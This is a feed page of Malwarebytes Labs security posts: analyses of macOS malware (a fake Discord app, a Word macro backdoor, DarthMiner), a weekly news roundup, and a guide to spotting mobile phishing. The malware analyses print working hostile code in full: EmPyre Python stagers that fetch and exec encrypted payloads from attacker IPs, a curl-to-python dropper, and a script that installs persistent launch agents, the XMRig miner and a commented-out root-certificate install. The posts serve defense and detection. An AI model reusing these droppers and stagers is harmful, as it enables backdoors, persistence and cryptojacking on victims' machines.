qPnQAZwbqBZ='PBlqIV' import sys, urllib2;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep" ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE) out = ps.stdout.read() ps.stdout.close() if re.search("Little Snitch", out): sys.exit() o=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['build_opener']).build_opener();UA='Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0';o.addheaders=[('User-Agent',UA)];a=o.open('http://37.1.221.204:8080/index.asp').read();key='7b3639a4ab39765739a5e0ed75bc8016';S,j,out=range(256),0,[] for i in range(256): j=(j+S[i]+ord(key[i%len(key)]))%256 S[i],S[j]=S[j],S[i] i=j=0 for char in a: i=(i+1)%256 j=(j+S[i])%256 S[i],S[j]=S[j],S[i] out.append(chr(ord(char)^S[(S[i]+S[j])%256])) exec(''.join(out))

The script also sets up a launch agent named com.apple.systemkeeper.plist, which persistently keeps both the screenshot code and the EmPyre backdoor code running.

This malware is really unconvincing, as it does nothing at all to pretend that it is a legit Discord app. It is not a maliciously-modified copy of the Discord app. It doesn’t even include and launch a copy of the Discord app, which it could do easily as a subterfuge to make the app look legit. For that matter, it doesn’t even use a convincing icon!

Instead, the malware uses a generic Automator applet icon, and all that happens when running is that a gear icon appears in the menu bar (as is normal for any Automator script).

Of course, by the time the user notices something is wrong, the malware has set up the launch agent, opened the backdoor, and sent off some screenshots. Many users may notice something is off, but they may not know what to do about it.

Interesting similarities

There are some interesting similarities between this fake Discord malware, which Malwarebytes detects as OSX.LamePyre, and the OSX.DarthMiner malware discovered earlier this week. Both are distributed in the form of Automator applets, both applets run Python scripts, and both use an EmPyre backdoor.

However, there are some differences as well. The means for running the Python script is different in these two cases. Further, the apparent primary purpose for the malware is also different: cryptomining, in the case of DarthMiner, and screen captures, in the case of LamePyre.

It seems likely that these could be made by the same person, but it’s also possible that one is a copycat of the other.

The Word macro malware (which Malwarebytes currently detects as OSX.BadWord, for lack of an official name) similarly sets up a backdoor using Python, and like OSX.DarthMiner, it executes the Python code directly in the launch agent, which is somewhat unusual. Of course, it uses a different backdoor and a different delivery method.

All three have made heavy use of borrowed code in the form of open-source backdoors (EmPyre in two cases, Metasploit’s Meterpreter module in the third) as well as copy-paste of VBA exploit code directly from a researcher’s blog.

Two malware, one maker?

The similarities between all these pieces of malware, as well as the close coincidence in timing (all were first submitted to VirusTotal within about a one month period), may mean that they were all be made by the same malware developer.

However, there is no concrete evidence for that supposition at this time. The IP addresses these pieces of malware communicate with are scattered around the globe in the US, Luxembourg, Germany, and the Netherlands, and there are no obvious connections between them. The code is similar, but not identical.

At this time, we are calling each of these by a different name, but will keep investigating.

In the meantime, the best things you can do to stay safe are:

  • Don’t allow macros to run in Microsoft Office documents
  • Don’t download software from anywhere other than the developer’s official site, and especially not piracy sites
  • Don’t open anything sent to you via email unless you know the sender and were expecting it
  • If you open a newly-downloaded application and something doesn’t work as expected, check with the developer
IOCs BitcoinMagazine-Quidax_InterviewQuestions_2018.docm: 4454e768b295ed2869f657b2e9f47421b6ca0548e67092735665cd339a41dddb DiscordApp.app.zip: a899a7d33d9ba80b6f9500585fa108178753894dfd249c2ba64c9d6a601c516b

The post Flurry of new Mac malware drops in December appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (December 3 – 9)

Malwarebytes - Mon, 12/10/2018 - 17:32

Last week on Malwarebytes Labs, we gave readers an FYI on multiple breaches that affected Humble Bundle, Quora, and Dunkin’ Donuts, to name a few. This follows the announcement from Marriott about a four-year-long breach that impacted half a billion of its patrons.

We also pushed out the report, “Under the Radar: The Future of Undetected Malware”, wherein we examined current threats and the technologies that are unprepared for them. You can download the report directly here.

Lastly, we discovered a new Mac malware, which has the combined the capabilities of the Empyre backdoor and the XMRig miner, and reported about a new Adobe Flash zero-day vulnerability that was used against a Russian facility in a targeted attack campaign.

Other cybersecurity news:

Stay safe!

The post A week in security (December 3 – 9) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Something else is phishy: How to detect phishing attempts on mobile

Malwarebytes - Mon, 12/10/2018 - 15:00

In a report published in 2011, IBM revealed that mobile users are three times more likely to fall for phishing scams compared to desktop users. This claim was based on accessed log files found on Web servers used to host websites involved in phishing campaigns.

Almost a decade later, we continue to see different organizations reporting an increased trend in phishing attacks targeting the mobile market. Surprisingly, phishers seem to have tipped the scales to a new preferred target: iPhone users. Wandera, a mobile security solutions provider, has observed that iOS users experience twice as many phishing attacks compared to their Android counterparts.

Mobile phishing by the numbers

Below is a quick rundown of current noteworthy mobile phishing statistics to date:

  • In the whitepaper “Mobile phishing 2018: Myths and facts facing every modern enterprise today” (PDF), Lookout has determined that the rate at which users are tapping phishing links has grown an average of 85% since 2011.
  • In the latest “Phishing Activity Trend Report” (PDF), the Anti-Phishing Working Group (APWG) has revealed that the Payments industry continues to rank as the top targeted sector by phishing threat actors (36%) in Q1 2018.
  • This same APWG report also claims that 35% of all phishing sites were using HTTPS and SSL certificates.

    With Google now labeling non-HTTPS website as “Non-Secure,” expect to see more phishers abuse the accepted concept that HTTPS sites are trustworthy and legitimate.

  • In their report, “2018 State of Phish”, Wombat Security hailed smishing, short for SMS phishing, as the attack vector to watch. This is due to its increased media reporting in 2017, which they believe will continue to trend, especially in countries with low awareness of mobile phishing.
  • PhishLabs stated in its “2018 Phishing Trends & Intelligence Report” (PDF) that Email/Online Services is the top targeted industry in the second half of 2017 (26.1%), with a high concentration of phishing URLs mimicking Microsoft Office 365 login pages. This suggests that there is an increasing trend of phishing campaigns targeting businesses.
  • This same PhishLabs report has also noted a dramatic increase of phishing campaigns banking on the trust of users towards software-as-a-service (SaaS) companies (7.1%). Such attacks are said to be non-existent before 2015 but have more than doubled in two succeeding years.
  • Wandera stated that 48% of phishing attacks happen on mobile. They also claim that iOS users are 18X more likely to fall for a phish than to download malware.
Mobile phishing scam types

Phishing attacks are no longer exclusive to emails, especially on mobile. A mobile device’s inherent design and features have made it possible for phishers to create ways on how they can get into users’ heads and get their hands on vital personal and business data.

While many users are quite familiar with what phishing looks like on the desktop, these same users are not as familiar with smishing or vishing—and other types of phish one might encounter on the mobile—as they are with email phishing.

SMiShing

SMiShing is phishing done through SMS. Android expert and Senior Analyst Nathan Collier has written about a smishing message a colleague received on their Android device that purportedly originating from a human resources company, promoting an open albeit fake position of Prime Agent for Amazon.

iOS users also have their share of spotted smishing campaigns. Below is a smishing message posted publicly on Reddit as a warning to other iPhone users:

Screenshot of an iOS SMS phishing message. Courtesy of Redditor u/jamesmt87.

Your Apple ID has been disabled until we hear from you ,
Prevent this by confirming your informations at {bit.ly URL}
Apple inc

Vishing

Vishing, or voice-mail phishing (at times, it also stands for VoIP phishing), is phishing done with the use of a device’s call feature. An attempt can be considered vishing if the potential phisher (1) leaves a recorded message to the target that something is wrong, (2) leaves a number that the target can use to call back, or (3) cold calls the target. Point two is precisely the tactic used by an iOS phishing scam that Ars Technica Editor Sean Gallagher revealed in a July 2018 post. According to Gallagher, an email directs users to a fake Apple website, which pops up a dialog box to start a call to a purported agent that goes by “Lance Roger at AppleCare.” AppleCare is Apple’s extended warranty service.

A vishing pop-up dialog box. Courtesy of Ars Technica.

In Android’s corner, we have the latest variant of Fakebank, a mobile Trojan that is capable of intercepting bank SMS and inbound and outgoing calls. A user, for example, making a call to a legitimate bank gets redirected to scammers who are posing as agents working for the bank. Security researchers have spotted this variant in affected apps geared towards Korean bank clients.

Vishing can also be a part of a greater business email compromise (BEC) attack.

Other types: messenger phishing, social phishing, and ad-network phishing

Apps continue to shape a user’s mobile experience for the better. Without them, one may likely just consider their phones as a pricey paperweight.

These brilliant little programs have made it possible for users to both access their personal and work emails while away from a desktop computer, keep in touch with family and friends via messaging platforms while on the go, share and access media in real-time, and stave off boredom while waiting.

Phishers, unfortunately, have leveraged the power of apps to their advantage. And the internet is rife with stories of people who got (or nearly got) phished via mobile apps.

Take, for instance, the Facebook message that used Messenger as a launchpad to spread a purported “viral video” of the recipient complete with their picture and name, and a number indicating the view count.

Screenshot of a Facebook Messenger phish. Courtesy of Security For Real People.

Clicking this “video” sent mobile users to a fake Facebook Videos login screen, wherein they were then encouraged to key in their Facebook credentials. Doing so sent a similar video bait to contacts, not to mention scammers hijacking the accounts of those who fell for this trick.

This is a case of messenger phishing. It is a type of phishing attempt that uses messaging services on mobile devices. Examples of these services are WhatsApp, Instagram, Viber, Skype, Snapchat, and Slack.

Then there’s social phishing, which is an attempt that abuses social networking sites to spread a phishing campaign. Below is a capture of a phishing message sent to a recipient via LinkedIn’s InMail feature:

Screenshot of a LinkedIn InMail phish. Courtesy of KnowBe4.

Here’s another case of social phishing: A Twitter account posing as NatWest bank inserted itself into a live conversation between a NatWest bank client and NatWest’s official Twitter channel in an attempt to present a bogus quick fix to the current concern the real bank was attempting to address.

Malwarebytes has caught a fake NatWest Twitter account red-handed.

Finally, ad-network phishing. On mobile, ads can come in many forms: They can be in free apps, on web pages the user visits, and as a pop-up notification or banner. Because apps communicate with other services (like an ad network) at the background, they can potentially expose mobile users to risks like a phishing campaign (at best) or malware (at worst).

We’d be remiss if we don’t mention phishing apps. These are fake apps that bank on the names of popular online brands, usually promising one or more perks if downloaded and installed. Such is the case of multiple fake Instagram apps that were pulled from the Google Play store after being found to collect credentials. These apps have been downloaded 1.5 million times, and they promise to boost follower count, post likes, and comments.

Mobile phish spotting

Mobile phishing attempts are quite a challenge to detect, more so for the uninitiated and the unacquainted. Regardless of your level of know-how or your computing platform of choice, as a rule of thumb, it is always best to familiarize yourself with common phishing tactics and trends. We already have a great and very comprehensive list of red flags that can guide you in determining phishing attempts in general. However, mobile users can significantly benefit from our listing of tell-tale signs of potential mobile phishing attempts (below) just as well:

  • The message comes out of the blue, claiming that you either (1) won a prize, (2) have an account or subscribed service suddenly deactivated (often without disclosing a reason), or (3) there is a very urgent need for you to do something to address a problem. Such claims are tried-and-tested social engineering ploys that more often than not give the game away.

    When it comes to being truly notified for actual breaches and that steps must be taken to mitigate its effects, however, it is best for users to avoid clicking links in these notifications (which we agree is faster and more convenient) in favor of going directly to the legitimate domain (either by loading it from bookmark or manually typing in the address in the address bar) and logging in from there.

  • The message comes from an unknown number or sender. And if it claims to be from a service you actually use, be doubly cautious. As it’s near impossible to determine on mobile if the service provider is who they say they really are, you might be better off verifying any claims for yourself, just like in the above point, and checking for logged suspicious activities. If you’re still a bit bothered, contact your service provider’s customer support department.
  • The message comes with a bogus hyperlink, which may be obvious to some but not to others. It pays to be very familiar with URLs of official web addresses of services you use online. If you feel or think that something is off, even if you’re unsure what is triggering this, err on the side of caution and avoid clicking that link.
  • The message comes with a shortened URL. Shortening URLs is an excellent method to make effective use of space that has a limited character count. Unfortunately, this can be abused to mask potentially malicious URLs from being detected at first glance.
  • If the message or caller asks for personal information, if not more information, from you. A majority of legitimate and reputable businesses don’t call or send messages asking for sensitive information. In some cases, banks do call if they suspect potential fraud activity with your account. They do this to check that you are who you say you are. However, there are certain information they will never ask you to divulge, such as your account PIN or Social Security Number (SSN).
  • If the message or caller doesn’t address you by your name. Again, a majority of businesses know who their clients are and will always address you by your name.
  • If the URL you get directed to doesn’t have a green padlock. Yes, having HTTPS on a website is no longer a solid proof that one is not on a malicious page, but there are still a lot of phishing campaigns out there that forgo using HTTPS.
  • If the URL you get redirected to appears to be right, but also has unexplained dashes after it. Phishers are already using a technique called URL padding, wherein they pad the subdomain, which consists of a legitimate website address, with hyphens to hide the real domain and create believability.

    Screenshot of a fake Facebook login screen where phishers used URL padding. Courtesy of PhishLabs.

    In this example, the complete URL is hxxp://m.facebook.com----------------validate----step1.rickytaylk[dot]com/sign_in.html, where rickytaylk[dot]com is the domain and m.facebook.com----------------validate----step1 is the long subdomain. Users would likely find it difficult to view the complete URL given the mobile’s small screen size, but what they can do is copy the URL and paste it on a notepad app. From there, users can scrutinize the URL more effectively.

A word on homograph attacks: Yes, they work on mobile devices, too. Fortunately, many of modern internet browsers are already programmed to display the Punycode version of domains that contain confusables (or non-English characters that visually appear similar to one or more English alphabets).

Users seeing a Punycode URL on their mobile browser could be alerted that they’re on a page they’re not supposed to be on. And this is a good thing. However, not all apps that accept and display text have considered the possibility of homograph attacks. According to Wandera’s research, many communications and collaboration tools used by employees on both Android and iOS don’t flag Punycode URLs as suspicious.

“Only Facebook Messenger, Instagram and Skype provided an opportunity for the user to identify the punycode URL by either showing a preview of the webpage with the xn prefix, or, in the case of skype, by not providing a hyperlink for domains using unicode, meaning users can’t click through from the message.” writes Liarna La Porta, Content Marketing Manager for Wandera, in a blog post. “While these apps are not providing the best methods of defense, they at least provide an opportunity to asses suspicious links more closely.”

Phish-proof no more?

In April of 2017, a Lithuanian man who posed as Quanta Computer, a Taiwanese electronics manufacturing company, successfully conned two big names in the tech industry, each paying him over $100M. These companies eventually got the bulk of their money back, but not after making headlines that made readers gasp. Who were these phishing victims? They’re Google and Facebook.

When it comes to a target’s low potentiality to fall for a phishing lure, it appears that tech savviness is slowly becoming a non-factor. It is challenging enough for desktop users to successfully determine a believable phish. With mobile devices, which already have a size limitation and more potential attack points, users are doubly challenged, especially if the adversary is motivated enough to steal the sensitive corporate data stored in them.

Indeed, phishing has branched beyond email. And using commodity-level phishing protection on mobile is inadequate in defending users from attacks. Being truly phish-proof (or akin to it) may require necessary adjustments on the side of both man and machine: improved security features on mobile devices and their apps, and knowing the red flags and what steps to take to adequately respond to a phishing attempt are key.

Recommended reading:

  • “Phishing attacks on modern Android” (direct PDF link here)
  • “Social Phishing” (direct PDF link here)

 

The post Something else is phishy: How to detect phishing attempts on mobile appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mac malware combines EmPyre backdoor and XMRig miner

Malwarebytes - Fri, 12/07/2018 - 16:57

Earlier this week, we discovered a new piece of Mac malware that is combining two different open-source tools—the EmPyre backdoor and the XMRig cryptominer—for the purpose of evil.

The malware was being distributed through an application named Adobe Zii. Adobe Zii is software that is designed to aid in the piracy of a variety of Adobe applications. In this case, however, the app was called Adobe Zii, but it was definitely not the real thing.

As can be seen from the above screenshots, the actual Adobe Zii software, on the left, uses the Adobe Creative Cloud logo. (After all, if you’re going to write software to help people steal Adobe software, why not steal the logo, too?) The malware installer, however, uses a generic Automator applet icon.

Behavior

Opening the fake Adobe Zii app with Automator reveals the nature of the software, as it simply runs a shell script:

curl https://ptpb.pw/jj9a | python - & s=46.226.108.171:80; curl $s/sample.zip -o sample.zip; unzip sample.zip -d sample; cd sample; cd __MACOSX; open -a sample.app

This script is designed to download and execute a Python script, then download and run an app named sample.app.

The sample.app is simple. It appears to simply be a version of Adobe Zii, most likely for the purpose of making it appear that the malware was actually “legitimate.” (This is not to imply that software piracy is legitimate, of course, but rather it means that the malware was attempting to look like it was doing what the user thought it was intended to do.)

What about the Python script? That turned out to be obfuscated, but was easily deobfuscated, revealing the following script:

import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep" ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE) out = ps.stdout.read() ps.stdout.close() if re.search("Little Snitch", out): sys.exit() import urllib2; UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://46.226.108.171:4444';t='/news.php';req=urllib2.Request(server+t); req.add_header('User-Agent',UA); req.add_header('Cookie',"session=SYDFioywtcFbUR5U3EST96SbqVk="); proxy = urllib2.ProxyHandler(); o = urllib2.build_opener(proxy); urllib2.install_opener(o); a=urllib2.urlopen(req).read(); IV=a[0:4];data=a[4:];key=IV+'3f239f68a035d40e1891d8b5fdf032d3';S,j,out=range(256),0,[] for i in range(256): j=(j+S[i]+ord(key[i%len(key)]))%256 S[i],S[j]=S[j],S[i] i=j=0 for char in data: i=(i+1)%256 j=(j+S[i])%256 S[i],S[j]=S[j],S[i] out.append(chr(ord(char)^S[(S[i]+S[j])%256])) exec(''.join(out))

The first thing this script does is look for the presence of Little Snitch, a commonly-used outgoing firewall that would be capable of bringing the backdoor’s network connection to the attention of the user. If Little Snitch is present, the malware bails out. (Of course, if an outgoing firewall like Little Snitch were installed, it would have already blocked the connection that would have attempted to download this script, so checking at this point is worthless.)

This script opens up a connection to an EmPyre backend, which is capable of pushing arbitrary commands to the infected Mac. Once the backdoor is open, it receives a command that downloads the following script to /private/tmp/uploadminer.sh and executes it:

# osascript -e "do shell script \"networksetup -setsecurewebproxy "Wi-Fi" 46.226.108.171 8080 && networksetup -setwebproxy "Wi-Fi" 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem\" with administrator privileges" cd ~/Library/LaunchAgents curl -o com.apple.rig.plist http://46.226.108.171/com.apple.rig.plist curl -o com.proxy.initialize.plist http://46.226.108.171/com.proxy.initialize.plist launchctl load -w com.apple.rig.plist launchctl load -w com.proxy.initialize.plist cd /Users/Shared curl -o config.json http://46.226.108.171/config.json curl -o xmrig http://46.226.108.171/xmrig chmod +x ./xmrig rm -rf ./xmrig2 rm -rf ./config2.json ./xmrig -c config.json &

This script downloads and installs the other components of the malware. A launch agent named com.proxy.initialize.plist was created to keep the backdoor open persistently by running exactly the same obfuscated Python script mentioned previously.

The script also downloads the XMRig cryptominer and a config file into the /Users/Shared/ folder, and sets up a launch agent named com.apple.rig.plist to keep the XMRig process running with that configuration active. (The “com.apple” name is an immediate red flag that was the root cause of the discovery of this malware.)

Interestingly, there’s code in that script to download and install a root certificate associated with the mitmproxy software, which is software capable of intercepting all web traffic, including (with the aid of the certificate) encrypted “https” traffic. However, that code was commented out, indicating it was not active.

On the surface, this malware appears to be fairly harmless. Cryptominers typically only cause the computer to slow down, thanks to a process that sucks up all the CPU/GPU.

However, this is not just a cryptominer. It’s important to keep in mind that the cryptominer was installed through a command issued by the backdoor, and there may very well have been other arbitrary commands sent to infected Macs by the backdoor in the past. It’s impossible to know exactly what damage this malware might have done to infected systems. Just because we have only observed the mining behavior does not mean it hasn’t ever done other things.

Implications

Malwarebytes for Mac detects this malware as OSX.DarthMiner. If you’re infected, it’s impossible to say what else the malware may have done besides cryptomining. It’s entirely possible it could have exfiltrated files or captured passwords.

There’s an important lesson to learn from this. Software piracy is known to be one of the riskiest activities you can undertake on your Mac. The danger of infection is high, and this is not new, yet people still engage in this behavior. Please, in the future, do yourself a favor and don’t pirate software. The costs can be far higher than purchasing the software you’re trying to get for free.

IOCs Adobe Zii.app.zip SHA256: ebecdeac53069c9db1207b2e0d1110a73bc289e31b0d3261d903163ca4b1e31e

The post Mac malware combines EmPyre backdoor and XMRig miner appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Pages

Subscribe to Furiously Eclectic People aggregator - Techie Feeds